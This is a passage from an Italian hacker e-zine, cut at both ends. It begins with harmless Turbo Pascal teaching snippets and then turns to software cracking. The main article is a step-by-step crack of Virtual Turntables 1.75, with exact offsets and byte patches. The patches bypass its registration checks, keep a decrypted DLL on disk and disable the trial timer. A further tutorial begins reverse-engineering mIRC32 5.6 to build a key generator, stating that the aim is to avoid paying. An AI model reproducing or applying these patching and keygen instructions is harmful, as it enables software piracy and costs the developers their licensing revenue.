swapvectors; if (DosError<>0) then begin GotoXY(10,14); writeln ('Non si riesce a far eseguire command.com'); GotoXY(10,16); readln; end end; readln; end; --- FINE CODICE --- Questa "utility" (uaaaaaaaaahahahhaha) mostra le linee del tuo dos caricate in memoria nel momento dell'esecuzione del programma angela. --- INIZIO CODICE --- begin clrscr; for i:=1 to envcount do writeln(envstr(i)); readln; end; --- FINE CODICE --- Con questo pezzo si puo' leggere la data odierna e cambiarne il giorno il mese e l'anno (ovviamente...direte voi :DDDDDDDD). --- INIZIO CODICE --- begin clrscr; getdate(anno,mese,giorno,ggsettimana); GotoXY(10,6); writeln('Oggi e'' esattamente ',giorni[ggsettimana],' ',giorno:0, '/', mese:0, '/', anno:0); GotoXY(10,8); readln; anno:=0; mese:=0; giorno:=0; GotoXY(10,10); writeln ('Vuoi cambiare la data ? (S/N o s/n)'); GotoXY(10,12); readln (risposta); if (risposta='s') or (risposta='S') then begin clrscr; GotoXY(10,3); writeln ('ATTENZIOME se immettete dati errati la data non variera''.'); GotoXY(10,5); writeln ('Dammi il nuovo giorno in numeri : '); GotoXY(10,7);readln (giorno); GotoXY(10,9); writeln ('Dammi il nuovo mese in numeri: '); GotoXY(10,11);readln (mese); GotoXY(10,13); writeln ('Dammi il nuovo anno in numeri: '); GotoXY(10,15);readln (anno); setdate(anno,giorno,mese); GotoXY(10,17); writeln ('Ora la data e'' impostata sul seguente giorno:'); GotoXY(10,19); getdate(anno,mese,giorno,ggsettimana); writeln(giorni[ggsettimana],' ',giorno:0, '/', mese:0, '/', anno:0); GotoXY(10,21); Readln; end; end; --- FINE CODICE --- Stessa cosa della funzione precedente solo che qui si puo' visualizzare e poi eventualmente modificare l'ora, i minuti, i secondi e i centesimi di secondo. --- INIZIO CODICE --- begin clrscr; risposta:='n'; gettime(ore,minuti,secondi,centesimi); GotoXY(10,6); writeln('Adesso sono esattamente le ',leadingzero(ore), ':',leadingzero(minuti),':',leadingzero(secondi), '.',leadingzero(centesimi)); GotoXY(10,8); readln; GotoXY(10,10); writeln ('Vuoi cambiare l''ora ? (S/N o s/n)'); GotoXY(10,12); readln (risposta); if (risposta='s') or (risposta='S') then begin clrscr; GotoXY(10,6); writeln ('Dammi il primo dato: '); GotoXY(35,6); readln (d1); GotoXY(10,8); writeln ('Dammi il secondo dato: '); GotoXY(35,8); readln (d2); GotoXY(10,10); writeln ('Dammi il terzo dato: '); GotoXY(35,10); readln (d3); GotoXY(10,12); writeln ('Dammi il quarto dato: '); GotoXY(35,12); readln (d4); settime(d1,d2,d3,d4); GotoXY(10,14); writeln('Adesso l''ora e'' impostata sulle ' ,leadingzero(ore),':',leadingzero(minuti), ':',leadingzero(secondi),'.',leadingzero(centesimi)); GotoXY(10,16); readln; end; end; --- FINE CODICE --- Dal nome stesso della funzione memavail si capisce che tramite essa si puo' vedere la quantita' di memoria available (quindi =disponibile) in un dato momento. --- INIZIO CODICE --- begin clrscr; GotoXY(10,10); writeln ('Hai ben ',memavail, ' byte liberi.'); GotoXY(10,12); writeln ('Il blocco libero piu'' grande e'' di ',maxavail,' byte.'); GotoXY(10,14); readln; end; --- FINE CODICE --- Il seguente spezzone serve a sommare + numeri pari e + numeri dispari dandone poi un rapporto alla fine (lo so manca la somma di tutti i numeri pari e dispari ma nessuno e' perfetto e alle 1.32 di sabato notte con dante che sta a fianco a scrivere l'altro articolo non mi sento le forze x cercare il cd con su pascal per ricompilarlo e fare il nuovo exe... --- INIZIO CODICE --- begin clrscr; x:=5; repeat clrscr; repeat GotoXY(10,3); writeln('Dammi il numero degli addendi: '); GotoXY(10,4); readln (n); until (n>0); I:=0; sommap:=0; sommad:=0; contap:=0; contad:=0; repeat GotoXY(10,x+1); writeln('Dammi un numero da sommare: '); GotoXY(10,x+2); readln(numero); controllo:=numero; x:=x+2; if odd(numero) then begin GotoXY(16,x); writeln ('...questo numero e'' --> Dispari'); end else begin GotoXY(16,x); writeln ('...questo numero e'' --> Pari'); end; repeat controllo:=controllo-2 until (controllo=0) or (controllo=1); if (controllo=0) then begin sommap:=sommap+numero; contap:=contap+1; end else begin sommad:=sommad+numero; contad:=contad+1; end; i:=i+1; GotoXY(10,x+1); until i=n; readln; clrscr; GotoXY(10,4); writeln('La somma dei numeri pari e'' uguale a ',sommap); GotoXY(10,5); writeln('I numeri pari sono uguali a ',contap); GotoXY(10,6); writeln('La somma dei numeri dispari e'' uguale a ',sommad); GotoXY(10,7); writeln('I numeri dispari sono uguali a ',contad); GotoXY(10,9); writeln('Vuoi calcolare la somma di altri numeri? (S/N o s/n)'); GotoXY(10,11); readln(risp); until (risp='n') or (risp='N'); end; --- FINE CODICE --- Questa (a seconda di tutti i miei beta-tester...cioe'...secondo me...) e una delle funzioni + belle e consiste esattamente nel mostrare a video tutti i codici ascii e i relativi valori ordinali cosicche' quando vi serve un codice ascii e non sapete dove sbattere la testa ricordatevi di angela... --- INIZIO CODICE --- begin clrscr; x:=5; GotoXY(6,3); writeln ('Questa e'' la lista dei codici ascii con relativi valori ordinali: '); for i:=1 to 255 do begin ascii[i]:=(chr(i)); ascii2[i]:=(ord(i)); end; clrscr; for i:=1 to 25 do begin writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=25 to 50 do begin writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=50 to 75 do begin writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=75 to 100 do begin writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=100 to 125 do begin writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=125 to 150 do begin writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=150 to 175 do begin writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=175 to 200 do begin writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=200 to 225 do begin writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=225 to 250 do begin writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=250 to 255 do begin writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]); end; readln; end; --- FINE CODICE --- Piccolo programmino che cripta una frase con il metodo spiegato in un mio precedente articolo sui fondamenti della crittografia (metodo del cifrario additivo puro e semplice) nel quale potete trovare la spiegazione teorica di questo caso. Per la parte pratica poi si usa una semplice sostituzione delle lettere guardando l'indice della lettera in chiaro nell'alfabeto normale e copiandone in un file temporaneo (che conterra' tutta la frase criptata) la lettera equivalente dell'alfabeto da noi scelto e creato tenendo conto dell'indice come dire...esportato dal primo al secondo alfabeto). Per qualsiasi chiarimento sono pronto a rispondere in mail o se ne verra' fatta richiesta (scritta ovviamente hihihi) sul prox numba della e-zinnnne. --- INIZIO CODICE --- begin clrscr; GotoXY(10,4); writeln ('Dammi un numero da 1 a 26 '); GotoXY(10,5); readln (X); for I:=1 to (26-X+2) do begin lettere2[I-1]:=lettere[I+X-2]; end; for I:=1 to (X-1) do begin lettere2[I+26-X]:=lettere[I-1]; end; GotoXY(10,7); writeln ('Ora vediamo il confronto tra l''alfabeto normale e'); GotoXY(10,8); writeln ('quello che inizia x la lettera che hai scelto: '); GotoXY(10,9); for I:=1 to 26 do begin write (lettere[I-1]); end; GotoXY(10,10); for I:=1 to 26 do begin write (lettere2[I-1]); end; readln; GotoXY(10,12); writeln ('Ora proviamo a criptare qualcosa. Scrivi una frase'); GotoXY(10,13); readln (cri); nas:=''; c:=0; for i:=1 to Length(cri)+1 do begin for j:=1 to 26 do begin if cri[i-1]=upcase(lettere[j-1]) then begin nas:=nas+(upcase(lettere2[j-1])); end else begin c:=c+1; end; if cri[i-1]=lettere[j-1] then begin nas:=nas+lettere2[j-1]; end else begin c:=c+1; end; if cri[i-1]=' ' then begin nas:=nas+' '; j:=26; end else begin c:=c+1; end; end; if c=78 then begin nas:=nas+cri[i-1]; c:=0; end; c:=0; end; GotoXY(10,16); writeln ('Questa e'' la tua frase/parola criptata col nuovo alfabeto:'); GotoXY(10,18); writeln (nas); nas2:=nas; GotoXY(10,20); readln; end; --- FINE CODICE --- Stessa cosa del precedente sotto-mini-programma con la differenza che se prima si criptava un afrse adesso la si decripta... --- INIZIO CODICE --- begin clrscr; nas:=nas2; if nas='' then begin GotoXY(8,6); writeln ('Devi eseguire il punto 17 prima di questo punto.'); GotoXY(8,7); readln; end else begin GotoXY(8,3); writeln ('Ora vediamo se riusciamo a decriptare la seguente frase:'); GotoXY(8,5); writeln (nas); GotoXY(8,6); readln; repeat GotoXY(8,8); writeln ('Inserisci un numero con il quale provare a decriptare la frase: '); GotoXY(8,9); readln (x); until (x>0) and (x<27); for I:=1 to (26-X+2) do begin lettere2[I-1]:=lettere[I+X-2]; end; for I:=1 to (X-1) do begin lettere2[I+26-X]:=lettere[I-1]; end; GotoXY(8,11); writeln ('Ora vediamo il solito confronto tra l''alfabeto normale e'); GotoXY(8,12); writeln ('quello che inizia x la lettera che hai scelto: '); GotoXY(8,13); for I:=1 to 26 do begin write (lettere[I-1]); end; GotoXY(8,14); for I:=1 to 26 do begin write (lettere2[I-1]); end; GotoXY(8,15); readln; GotoXY(8,16); writeln ('Ora proviamo a decriptare la frase immessa al punto 17: '); cri:=''; d:=0; for i:=1 to Length(nas)+1 do begin for j:=1 to 26 do begin if nas[i-1]=upcase(lettere2[j-1]) then begin cri:=cri+(upcase(lettere[j-1])); end else begin d:=d+1; end; if nas[i-1]=lettere2[j-1] then begin cri:=cri+lettere[j-1]; end else begin d:=d+1; end; if nas[i-1]=' ' then begin cri:=cri+' '; j:=26; end else begin d:=d+1; end; end; if d=78 then begin cri:=cri+nas[i-1]; d:=0; end else if (d<>78) then begin d:=0; end; end; GotoXY(8,18); writeln (cri); GotoXY(10,19); readln; end; end; --- FINE CODICE --- Sulla prossima parte no comment. --- INIZIO COMMENTO --- begin clrscr; GotoXY(8,2); writeln (' NOTE DI N0bodY88'); GotoXY(8,3); writeln (' Questo programma e'' frutto di alcune ore di studio'); GotoXY(8,4); writeln (' del PASCAL fatte solamente sulla base degli Help che'); GotoXY(8,5); writeln (' ci sono in Turbo Pascal, quindi se volete dirmi che'); GotoXY(8,6); writeln (' voi ci avreste messo meta'' del tempo, l''avreste fatto'); GotoXY(8,7); writeln (' meglio e senza errori...beh...non ditemelo che tanto lo'); GotoXY(8,8); writeln (' so gia'' :P '); GotoXY(8,9); writeln (' Per quanto riguarda i molti GotoXY e la poca, scarsa e complessa'); GotoXY(8,10); writeln (' grafica considerate che la libreria Graph non mi funzia quindi...'); GotoXY(8,11); writeln (' Ci tengo a precisare che ho corretto molti degli errori presenti'); GotoXY(8,12); writeln (' sia di codice che di logica ma non assicuro che non ce ne siano'); GotoXY(8,13); writeln (' molti altri eheheh'); GotoXY(8,14); writeln (' Dedico questo programma a: tutti gli Spippolatori con in testa'); GotoXY(8,15); writeln (' RigoR MorteM e Jamil, a tutti quelli del NewBies Staff che magari'); GotoXY(8,16); writeln (' adesso sono al numero 10 della e-zine, ai DiB, al S0ftProject con in'); GotoXY(8,17); writeln (' testa Spirit, Cavallo, Fusys e LordFelix, alle BadLands, e in particolar'); GotoXY(8,18); writeln (' modo a mia madre per tutto quello che ha fatto per me.'); GotoXY(8,19); writeln (' Un augurio speciale a Chrome per il suo "Supermercato dell''hacker"'); GotoXY(8,20); writeln (' (si chiama cosi'' mi hanno detto... e'' vero? hihihi)'); GotoXY(8,21); writeln (' Infine un ultimo saluto al mitico ULNTWH99 e ad Alfredo, amici'); GotoXY(8,22); writeln (' che confermano il detto "chi trova un amico trova un tesoro".'); GotoXY(8,23); writeln (' Un ringraziamento molto particolare a RigoR MorteM al'); GotoXY(8,24); writeln (' quale dico che il pacchetto lo tengo ancora x ricordo...'); GotoXY(8,26); readln; end; --- FINE COMMENTO --- Ora che ho finito questo articolo, Dante e' ancora li' che fa il suo e volevo cogliere l'occasione x dire che...HO FINITO PRIMA IO :PPPPPPPP...hihiihihihi ...e poi io sarei un "maturato"...tnx ai mie prof e un fUK alla mia prof di mate che in confronto alien e' bello quanto pamela anderson ;) PS: non scrivetemi x pigliarmi x il culo...bastano gia' quei 30-40 che lo fanno gia' ;) quindi...ah un ultima cosa...ovviamente come al solito ogni consiglio e' ben accetto come qualsiasi critica anke dura tanto dopo aver passato la maturita' ho ricominciato a credere in un dio che...vi punira' tutti ahahahahahhh PSS: dedico questo articolo al mio amico Eugenio il miglior NewBies che conosca (xche' se dico hacker dopo si riprende l'UpLink che m'ha prestato e dopo che ci faccio con ll3???). Un saluto speciale a Federico, a Dante, a DeVilNeT, a RigoR MorteM, a \sPIRIT\ e a tutti quelli che aiutano qualcuno senza chiedere niente in cambio, quindi a tutti quelli che portano avanti tutto il crazy world of internet indipendentemente dal fatto che buchino server o meno e dal fatto che usino linux o windows... Byez N0bodY88 ۰۰۰۰۰۰۰۰۰۰ ۰۰۲۰۲۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰ ͻ Ŀ HOW TO VTT 1.75 ٺ ͼ SOLITA PREMESSA: non sono un cracker, non sono un hacker, sono un newbies come voi. Quindi se troverete in questo articolo qualche imprecisione e/o qualke stronzata non venitevi a lamentare :) Saluti: DantuzAliguz, nobo, harlok, yado, falcon, dev666, lord, ecc . . . Per questo quarto numero di newbies, tanto per cambiare, ho deciso di scrivere un articolo sul cracking. Iniziamo subito senza perdere troppo tempo . . . Oggi crakkeremo Virtual Turntables 1.75. Ho deciso di scrivere un articolo su questo prog xche' mi ha incuriosito il suo sistema di protezione. Gli strumenti necessari sono sempre i soliti: il mitico SI (che cmq lo useremo poco xche' il lavoro l'ho gia' fatto io;), Windasm e Hiew Installiamolo e per iniziare diamo un'okkiata al prog. All'avvio ci appare un primo nag screen poi nel menu' appare un tasto register!. MMM ok. I problemi sorgono quando cercheremo di disattivare il timer che dopo 20 min ci chiude il prog !! Ma procediamo con calma . . . per ora proviamo a togliere il nag e il tasto register! Apriamo windasm e disassebliamo il vtt.exe. Clikkiamo su Functions/Imports. Ecco la lista di tutte le chiamate che il prog effetua. Naturalmente ci salta subito all'occhio quella kiamata Devices.?CheckRegistered@@YAHXZ Ci rediamo conto che il prog effettua questa kiamata in quattro punti che riporto: * Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h :004122CC E851500100 Call 00427322 * Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h :00417D50 E8CDF50000 Call 00427322 * Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h :00417D85 E898F50000 Call 00427322 * Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h :0041998B E892D90000 Call 00427322 Ma attenzione . . dopo ogni chiamata al device.dll il prog in tutte e 4 i punti confronta eax con il valore 01. Per far credere al programma di essere registato bastera' forzare in tutti e 4 i punti il jmp condizionato. Procediamo modificando l'offset 122D8 da 74(je) in EB(jmp) Quindi il je all'offest 17D58 da 74(je) EB(jmp) Il je 17D8D da 74(je) EB(jmp) e per finire il 0F al 19995 in E9 con un 83 al 19996, un 00 all'19997 e un 90(nop) all'1999A Avviamo VTT ed ecco che il nostro amato programma parte senza quel fastidioso Nag iniziale e il tasto register! nel menu. Passiamo ora alla fase numero 2 (ben + complicata) Se non avete capito niente fino ad ora . . . vi consiglio di rileggerlo con + attenzione o se siete negati x il cracking passate pure al prossimo articolo. Il programma dopo 20 min da quando viene aperto si kiude automaticamente utilizzado probabilmente un timer interno. Probabilmente esistono altri modi per arrivare alla soluzione, ma preferisco procedere per ora in questo modo che credo sia il + facile da spiegare. Avviamo l'SI e attiviamo un BPX su MessageBoxA Quindi CTRL+D per uscire. Avviamo vtt e attendiamo i 20 min necessari (uufff per perdere tempo provate a mixarvi qualke mp3 :)) OK 19 min . . . 20 !! Premete F12 per uscire dall'user32, clikkate su ok poi F12 fino a quando non vi trovate in qualkosa del tipo TMP1090.dll (il numero 1090 puo' anke cambiare). A questo punto vi chiederete: ma do' sta sto TMP1090.dll ???? Bhe ve lo dico io . . . e' un dll temporaneo che il programma decrypta e posiziona nella temp di windows con un nome radom (ecco xche' vi dicevo che il 1090 puo' cambiare). Direte voi bhe apriamo sto file forziamo i jmp e il gioco e' fatto !! NO Non si puo' fare !! Il file temporaneo e' quello che si ottiene decryptando il file InitSound.dat che si trova nella stessa dir di VTT. Noterete che la differenza tra il file tmp e il initsound.dat e' di un solo byte ma il secondo essendo un dll cryptato non e' possibile apriro col windasm e quindi modificarlo !! Quando poi kiudiamo il vtt.exe il file tmp viene automaticamente cancellato senza che noi ci accorgessimo di nulla. Appreso questo serve un po' di ragionamento per riuscir a fregare il ben studiato prog. Bhe non avete voglia di ragionare ??? non avete tempo ??? allora ve lo dico io . . . Tutto quello che vi sto per dire e' il frutto di un'ispirazione . . . Skematizzo il tutto per rendere + facile: COSA FA VTT.EXE - controlla se registrato nel vtt.exe (jmp che abbiamo gia' forzato ... non c'e' problem,a controllasse pure :))) NEL DEVICES.DLL - preleva il file initsound.dll - lo decrypta - gli assegna un nome random - lo mette nella dir temp di windows - effettua una kiamata al file ALL'INTERNO DEL FILE TEMPORANEO - controlla se il prog e' registato - se non lo e' avvia il timer - inizializza l'audio (PORC' PROPRIO QUI DOVEVA FARLO ????) NEL DEVICES.DLL - cancella il file temp Lo skema e' abbastanza chiaro . . . credo :)) Bhe se il fottuto del programma non inizializzasse l'audio nel file temporaneo sarebbe bastato cancellare la kiamata al file stesso impedendo in ogni caso che il timer venga avviato. Ma cio' non e' possibile quindi cercheremo di optare x un'altra via . . . Ora skematizza l'altra via: ALTRA VIA: - controlla se registrato nel vtt.exe (jmp che abbiamo gia' forzato . . . non c'e' problema, controllasse pure :))) NEL DEVICES.DLL - salta - salta - salta - salta - effettua una kiamata al file (eheh gia' decryptato e modificato che noi avremo posizionato nell dir di vtt) ALL'INTERNO DEL FILE TEMPORANEO - controlla se il prog e' registato - anke se non lo e' facciamo in modo che il timer non venga avviato - inizializza l'audio (OK) NEL DEVICES.DLL - NON cancella il file temp (xche' non e' + un temporaneo) Tutto kiaro ???? Bhe vediamo ora come si puo' fare . . . Prima di tutto procuriamoci il dll che il nostro mitico vtt ci decrypta e ci mette nella temp di win. Quindi avviamo il prog, buttiamolo giu', apriamo il gestione risorse e copiamoci il file tmpxxxx.tmp nella dir di vtt rinominandolo in devilcrk.dll. Ci okkuperemo dopo di questo file. Per ora procediamo con il devices.dll facendogli saltare il processo del decrypt. Procediamo pure con il Windasm. Apriamo il file a diamo un'akkiata a Functions/Imports * Reference To: KERNEL32.GetTempFileNameA, Ord:0163h OOH MA KE BELLO !! Clikkiamo due volte su KERNEL32.GetTempFileNameA: * Referenced by a CALL at Address: |:10006361 | :10005E60 6AFF push FFFFFFFF :10005E62 64A100000000 mov eax, dword ptr fs:[00000000] :10005E68 68D8830010 push 100083D8 :10005E6D 50 push eax :10005E6E B828130000 mov eax, 00001328 :10005E73 64892500000000 mov dword ptr fs:[00000000], esp :10005E7A E8211E0000 call 10007CA0 :10005E7F A144E60010 mov eax, dword ptr [1000E644] :10005E84 53 push ebx :10005E85 8BC8 mov ecx, eax :10005E87 55 push ebp :10005E88 40 inc eax :10005E89 56 push esi :10005E8A 85C9 test ecx, ecx :10005E8C 57 push edi :10005E8D A344E60010 mov dword ptr [1000E644], eax :10005E92 0F851B020000 jne 100060B3 :10005E98 8D9424F0010000 lea edx, dword ptr [esp+000001F0] :10005E9F 52 push edx :10005EA0 6800010000 push 00000100 * Reference To: KERNEL32.GetTempPathA, Ord:0165h | :10005EA5 FF1548900010 Call dword ptr [10009048] :10005EAB 8D8424EC000000 lea eax, dword ptr [esp+000000EC] :10005EB2 8D8C24F0010000 lea ecx, dword ptr [esp+000001F0] :10005EB9 50 push eax :10005EBA 6A00 push 00000000 * Possible StringData Ref from Data Obj ->"tmp" | :10005EBC 68CCE20010 push 1000E2CC :10005EC1 51 push ecx * Reference To: KERNEL32.GetTempFileNameA, Ord:0163h | :10005EC2 FF154C900010 Call dword ptr [1000904C] Esaminiamo un po' cosa accade qui . . . Il tutto inizia con una kiamata dal 10006361. Nella stringa :10005E92 0F851B020000 jne 100060B3 viene effettuato un controllo: e' gia' stato creato il file temp ??? Se no continua con il codice . . . nel caso contrario effettua il jmp. Ma sikkome a noi non serve che il file venga creato forziamo il jmp in modo tale ke il salto venga compiuto cmq in ogni caso. Prendiamo l'offset (5E92) e proseguiamo con l'hiew. Cerchiamo con F5 l'offset poi F3 per modificare il file e con F2 modifichiamo il jne in jmp (attenzione nella riga successiva e' necessario poi mettere un nop) Riprendiamo il Windasm ed esaminiamo ora il codice dopo il jmp che riporto qui: * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:10005E92(C) | :100060B3 6840E50010 push 1000E540 <===== * Reference To: MFC42.MFC42:NoName0010, Ord:04A9h | :100060B8 E8C91F0000 Call 10008086 * Reference To: KERNEL32.GetLastError, Ord:011Ah | :100060BD 8B1D50900010 mov ebx, dword ptr [10009050] :100060C3 8BE8 mov ebp, eax Ci troviamo a questo punto sulla stringa 100063B3 In questo punto il prog fa un push di 1000E540 dove si trova la path del file temporaneo (sara' qualkosa tipo: c:\windows\temp\tmpxxxx.tmp che a noi servira' modificare in devilcrk.dll) Per far questo riapriamo il nostro sempre amato Hiew con F4 scegliamo Hex quindi con F5 cerchiamo la stringa E540. Procediamo con la modica con F3 quindi F8 e inserite nel campo ASCII devilcrk.dll premete invio e poi F8. A questo punto vedrete sulla destra il testo inserito F9 x salvare. Potete anche provare a far partire vtt per verificare se avete fatto tutto correttamente. Il programma dopo 20 min si kiudera' ancora ma la differenza sara' che vtt non creera' piu' il file temporaneo e quindi andra' sempre a rikiamare il nostro devilcrk.dll. Opss . . . porc' . . . se kiudiamo il programma, vtt canellera' il file devilcrk.dll credendo sia un file temporaneo. Procediamo eliminando la chiamata che ci cancella il nostro benedetto file. Quindi: windasm, devices.dll, functions, imports, mmmm Ma guarda che bella kiamata al KERNEL32.DeleteFileA !!! hihi clikkiamo 2 volte . . . ci troviamo qui' * Reference To: MFC42.MFC42:NoName0009, Ord:047Fh | :10006178 E8031F0000 Call 10008080 :1000617D A144E60010 mov eax, dword ptr [1000E644] :10006182 48 dec eax :10006183 A344E60010 mov dword ptr [1000E644], eax :10006188 750A jne 10006194 :1000618A 83C604 add esi, 00000004 :1000618D 56 push esi * Reference To: KERNEL32.DeleteFileA, Ord:0057h | :1000618E FF1544900010 Call dword ptr [10009044] <===Qui' * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:10006188(C) | :10006194 5E pop esi :10006195 C3 ret A questo punto sara' necessario cancellare questa kiamata ma dobbiamo cancellare anke l'add esi,04 e il push dell'esi altrimenti mandiamo in tilt il programma :)) L'offset della 1000618A e' 618A Apriamo Hiew e noppiamo dalla 618A fino alla 6193 con il codice eax 90 (nop) Fatto questo, possiamo riaprire vtt, chiuderlo e constatare che il file devilcrk.dll non viene + cancellato. Sara' ora necessario crakkare il file devilcrk.dll affinke' non venga avvito il timer. Vediamo un po' che si puo' fare . . . Aprima con Windams il file Refs/String data reference "**** YOUR TIME LIMIT HAS NOW EXPIRED!! " Clikkiamo 2 volte: * Referenced by a (U)nconditional or (C)onditional Jump at Addresses: |:10001A1A(C), :10001A53(C) | :10001A71 B801000000 mov eax, 00000001 :10001A76 5E pop esi :10001A77 C3 ret :10001A78 90 nop :10001A79 90 nop :10001A7A 90 nop :10001A7B 90 nop :10001A7C 90 nop :10001A7D 90 nop :10001A7E 90 nop :10001A7F 90 nop Exported fn(): DllCheckRegistered - Ord:0001h :10001A80 E81B020000 call 10001CA0 :10001A85 8B0D80530010 mov ecx, dword ptr [10005380] :10001A8B 33C0 xor eax, eax :10001A8D 85C9 test ecx, ecx :10001A8F 0F95C0 setne al :10001A92 C3 ret :10001A93 90 nop :10001A94 90 nop :10001A95 90 nop :10001A96 90 nop :10001A97 90 nop :10001A98 90 nop :10001A99 90 nop :10001A9A 90 nop :10001A9B 90 nop :10001A9C 90 nop :10001A9D 90 nop :10001A9E 90 nop :10001A9F 90 nop * Referenced by a CALL at Address: |:100019FA | :10001AA0 8B4C2404 mov ecx, dword ptr [esp+04] :10001AA4 8B442408 mov eax, dword ptr [esp+08] :10001AA8 6A00 push 00000000 :10001AAA 50 push eax :10001AAB 8B11 mov edx, dword ptr [ecx] :10001AAD 52 push edx * Reference To: DSOUND.DirectSoundCreate, Ord:0003h | :10001AAE E89D070000 Call 10002250 :10001AB3 F7D8 neg eax :10001AB5 1BC0 sbb eax, eax :10001AB7 40 inc eax :10001AB8 C3 ret :10001AB9 90 nop :10001ABA 90 nop :10001ABB 90 nop :10001ABC 90 nop :10001ABD 90 nop :10001ABE 90 nop :10001ABF 90 nop :10001AC0 81ECE8030000 sub esp, 000003E8 :10001AC6 53 push ebx :10001AC7 55 push ebp :10001AC8 56 push esi :10001AC9 57 push edi * Reference To: MFC42.MFC42:NoName0004, Ord:0497h | :10001ACA E887090000 Call 10002456 :10001ACF 85C0 test eax, eax :10001AD1 7410 je 10001AE3 * Reference To: MFC42.MFC42:NoName0004, Ord:0497h | :10001AD3 E87E090000 Call 10002456 :10001AD8 8B10 mov edx, dword ptr [eax] :10001ADA 8BC8 mov ecx, eax :10001ADC FF527C call [edx+7C] :10001ADF 8BD8 mov ebx, eax :10001AE1 EB02 jmp 10001AE5 * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:10001AD1(C) | :10001AE3 33DB xor ebx, ebx * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:10001AE1(U) | :10001AE5 68804F1200 push 00124F80 * Reference To: KERNEL32.Sleep, Ord:023Fh | :10001AEA FF15EC600010 Call dword ptr [100060EC] :10001AF0 83C9FF or ecx, FFFFFFFF * Possible StringData Ref from Data Obj ->"**** YOUR TIME LIMIT HAS NOW EXPIRED!! " I jmp all'10001A1A e 10001A53 sono quelli che cerkiamo :10001A1A 7555 jne 10001A71 :10001A53 751C jne 10001A71 Ci bastera' modificare i jne degli offset E1A e E53 in je con il nostro hiew Avviamo vtt . . . 5 10 20 30 min . . . WoW il gioco e' fatto !! X eventuali domande, crtitiche, minacce di morte, la mia mail e' devilnet@freemail.it sempre pronto a rispondere ad ogni vostro messaggio. Alla proxima DeViLNeT ͻ Ŀ GENERATORE DI CHIAVI X MIRC32 5.6 ٺ ͼ Autore: cod Oggetto: mIRC32 5.6 Obiettivo: Generatore di chiavi Strumenti: SoftICE 4.0 IDA 3.8a Window Disassembler 8.93 Livello: BOOOO DECIDETE VOI NOTA: L'AUTORE NON SI ASSUME NESSUNA RESPONSABILITA' PER CIO' CHE FARETE DI QUESTO DOCUMENTO... CESTINATELO E ACQUISTATE IL mIRC (in tal caso sarete SCEMI) N.B.: LE INFORMAZIONI CONTENUTE QUI SONO FRUTTO DELLE MIE FANTASIE PERVERSE E DI QUELLE DEGLI AUTORI DI SOFT ICE E DI IDA mIRC32 il pi diffuso programma di IRC in ambiente Windows. Il programma ha un costo di 20 dollari pari a circa 40.000 lire (per eccesso). Non una gran cifra da sborsare e non venite a dire che il programma non utile. Vogliamo acquistare tale programma, perch siamo gente onesta (... spero voi) quindi leggiamo la guida in linea... cosa dice? Abbiamo due modi per spedire i soldi... mandandoli via posta ordinaria al seguente indirizzo: Khaled Mardam-Bey Apt. 347, 56 Gloucester Road, London SW7 4UB, UK ... questo modo non tanto sicuro.. chiss quando arriveranno... vediamo il 2. modo: Registrazione on-line, richiesto un numero di carta di credito... be se avete una carta di credito scegliete questa via e smettete di leggere. Siete ancora qui ? Allora avete lo stesso problema mio... niente carta di credito (non provate con i generatori...) allora cosa possiamo fare? L'unico sarebbe crackare il programma, ma ad ogni aggiornamento ci toccher crackare! E' gi perch la minima variazione a livello di codice sorgente pu generare un file eseguibile totalmente diverso! Allora non lo crackiamo... facciamo un p di reverse enginering (non sapete che ? allora... reverse significa inverso engin motore... o qualcosa del genere... quindi fare ci che fa il programma all'inverso) Ma cosa ci pu interessare a noi ? La procedura di registrazione, ed il calcolo della PASSWORD. Allora lanciamo il programma WDASM e disassembliamo l'eseguibile MIRC32.EXE Cerchiamo la parola 'Sorry'... trovata ecco! Andiamo un p su nel codice e noteremo un salto condizionale... Andiamo all'istruzione che effettua il salto e troviamo il seguente codice: PUSH DWORD * Questa DWORD punta al seriale PUSH DWORD * Questa DWORD punta al nome CALL XXXXXXXX * Chiama una funzione TEST EAX, EAX * Confronta EAX JE YYYYYYYY * Salta se EAX uguale a 0 Traduciamo questo codice in un linguaggio ad alto livello: if ValidatePassword(Name, Password) = 0 goto error ok ora andiamo ad analizzare la funzione CALL... La prima cosa che fa questa funzione quella di chiamare un'altra funzione che ritorna un numero intero: name_len=strlen(Name); if (name_len < 5) return 0; Quindi se il nome inserito minore di 5 caratteri ritorna 0 e il programma ci rimanda a error. Subito dopo questo if troviamo un'altra funzione che ha come parametri esattamente Name e Password... chiameremo tale funzione GenerateKey... new_key=GenerateKey(Name, Password); if (new_key != 0) goto continue else return 1; Ma il valore new_key cosa contiene ? Potrebbe contenere la nostra password quindi andiamo ad analizzare questa funzione! La prima cosa che fa il programma quella di trovare il trattino nella password per scomporla in due sub codici. Per questo 